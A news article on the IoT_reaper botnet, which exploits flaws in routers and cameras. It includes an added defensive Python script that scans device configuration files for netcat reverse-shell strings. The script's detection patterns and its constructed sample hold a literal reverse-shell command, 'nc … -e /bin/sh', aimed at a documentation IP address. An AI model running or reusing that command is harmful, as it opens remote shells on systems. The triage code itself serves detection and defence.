Just a year ago, Mirai malware held the world to ransom when it enslaved millions of IoT devices into a botnet that cyber-criminals used to launch massive DDoS attacks, disrupting several internet services around the world. Security researchers now warn that last year's events might repeat themselves.
First spotted in September by security researchers at Qihoo 360, the new malware, dubbed "IoT_reaper", doesn't depend on cracking weak passwords to enslave IoT devices into a botnet; instead, it exploits vulnerabilities in them.
The malware attempts to exploit several vulnerabilities commonly found in different IoT devices. Targeted manufacturers include D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, JAWS, GoAhead, Vacron, Synology and others.
Researchers believe that IoT_reaper malware has infected nearly 2 million devices with an infection rate of 10,000 new devices per day.
A check carried out by CheckPoint on an infected GoAhead device revealed that the attackers accessed the System.ini file to check for compromise. Normally, the System.ini file contains the user's credentials, but on the hacked device it contained a 'Netcat' command that opens a reverse shell to the attacker's IP instead!
The check revealed that the GoAhead device, which was infected using the CVE-2017-8225 vulnerability, was itself transmitting the malware after being infected. This explains the fast rate at which the malware is spreading.
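A defender who has retrieved a copy of a device's configuration file can triage it for the same symptom: shell commands where credentials should be. The Python below is an added example, not CheckPoint's tooling or code from the original article; the rule set, function names and sample bytes are assumptions constructed for illustration, and the file is treated as an opaque blob because the article does not describe its layout.

```python
import re

# Heuristic rules written for this example (not a vendor signature set):
# a credentials file has no reason to hold a netcat call or a shell path.
RULES = {
    "netcat-to-ip": re.compile(
        rb"\b(?:nc|ncat|netcat)\s+(?:-\w+\s+)*\d{1,3}(?:\.\d{1,3}){3}\b"),
    "exec-shell": re.compile(rb"-[ec]\s*/bin/(?:a|ba)?sh\b"),
}

def printable_runs(blob, min_len=4):
    """Return printable-ASCII runs from an opaque blob, like strings(1)."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)

def triage(blob):
    """Return (rule, string) pairs for every run that matches a rule."""
    hits = []
    for run in printable_runs(blob):
        for name, pattern in RULES.items():
            if pattern.search(run):
                hits.append((name, run.decode("ascii")))
    return hits

# Constructed samples: NUL-padded fields only mimic a binary config file;
# they are not the real System.ini layout. 192.0.2.10 is a documentation IP.
CLEAN = b"\x00" * 16 + b"admin" + b"\x00" * 27 + b"S3cure-pass" + b"\x00" * 21
TAMPERED = (b"\x00" * 16 + b"admin" + b"\x00" * 27
            + b"nc 192.0.2.10 4444 -e /bin/sh" + b"\x00" * 3)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, triage(blob) or "no findings")
```

Any finding is a reason to isolate the device and inspect it further; an empty result does not prove the device is clean.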
As of now, those behind the malware are still unknown, but one thing is clear: the actors are preparing for a massive global attack.
Researchers at CheckPoint also warned of the forthcoming attack:
"Our researcher suggests we are now experiencing the calm before an even more powerful storm. The next cyber hurricane is about to come."